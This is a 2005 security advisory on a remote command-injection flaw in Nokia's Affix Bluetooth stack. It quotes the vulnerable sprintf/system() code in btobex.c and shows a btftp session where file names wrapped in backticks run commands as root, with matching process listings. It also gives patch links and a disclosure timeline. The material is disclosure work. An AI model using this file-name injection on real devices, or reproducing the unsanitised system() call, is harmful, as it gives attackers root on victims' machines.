DMA-2005-0712b.txt

`DMA[2005-0712b] - 'Nokia Affix Bluetooth btsrv/btobex poor use of system()'  
Author: Kevin Finisterre  
Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net  
Product: 'affix'  
References:   
http://www.digitalmunition.com/DMA[2005-0712b].txt  
  
Description:   
Affix is a Bluetooth Protocol Stack for Linux that was developed by the Nokia Research Center in   
Helsinki and released under GPL. Affix supports the core Bluetooth protocols like HCI, L2CAP 1.1,   
L2CAP 1.2, RFCOMM, SDP and various Bluetooth profiles. Affix consists of 'affix-kernel' which   
provides kernel modules and 'affix' which provides control tools, libraries, and server daemons.  
  
Although Nokia believes that Affix is an useful piece of software, please bear in mind that it is   
not an official Nokia product, but a result of the research activity of Nokia Research Center.  
  
The following code snippet was found in affix-3.2.0/obex/btobex.c:  
  
char cmd[PATH_MAX];  
sprintf(cmd, "/bin/mv \"%s\" \"%s\"", file, name);  
fd = system(cmd);  
if (fd) {  
BTERROR("failed: system(\"%s\") = %d\n", cmd, fd);  
}  
  
Exploitation of the above bug is fairly trivial with a little help from the btftp client.   
Please note that btsrv should be run as root to allow access to Bluetooth devices.  
  
animosity:~# btftp  
Affix version: Affix 3.2.0  
Welcome to btftp (OBEX) tool. Type ? for help.  
Mode: Bluetooth  
ftp> open 01:02:03:04:05:06  
Service found on channel: 6  
Connected.  
  
ftp> put /etc/hosts `id`  
Transfer started...  
Transfer complete.  
257 bytes sent in 0.9 secs (2855.56 B/s)  
ftp> ls  
-rwdx 257 uid=0(root) gid=0(root) groups=0(root)  
Command complete.  
  
ftp> put /etc/hosts `hostname`  
Transfer started...  
Transfer complete.  
257 bytes sent in 0.7 secs (3671.43 B/s)  
ftp> ls  
-rwdx 257 uid=0(root) gid=0(root) groups=0(root)  
-rwdx 257 frieza  
Command complete.  
  
As you can see in the ps output no input cleaning is done on the user supplied data, thus  
we are able to execute commands as root.   
  
root 803 802 0 10:27 ttyp2 00:00:00 btsrv -C ./btsrv.conf  
root 820 803 0 10:31 ttyp2 00:00:00 /usr/local/bin/btobex  
root 871 820 0 10:40 ttyp2 00:00:00 sh -c mv "/tmp/obex_tmp_ymZF0T" "`id`"  
root 872 871 0 10:40 ttyp2 00:00:00 sh -c mv "/tmp/obex_tmp_ymZF0T" "`id`"  
  
No exploit is required in order to take advantage of the above mentioned issue.   
  
Official patches for Affix can be found at http://affix.sourceforge.net  
http://affix.sourceforge.net/affix_320_sec.patch  
http://affix.sourceforge.net/affix_212_sec.patch  
  
This is basic timeline associated with this bug.   
  
07/12/05 Public disclosure  
07/11/05 notice that Security update.Patch for affix-3.2.0 was posted 07/01/05  
07/06/05 Ask Carlos for update...   
06/17/05 Carlos.Chinea stated "you are using a old version of affix...Please update"  
06/14/05 Carlos.Chinea contacted  
  
-KF  
  
  
`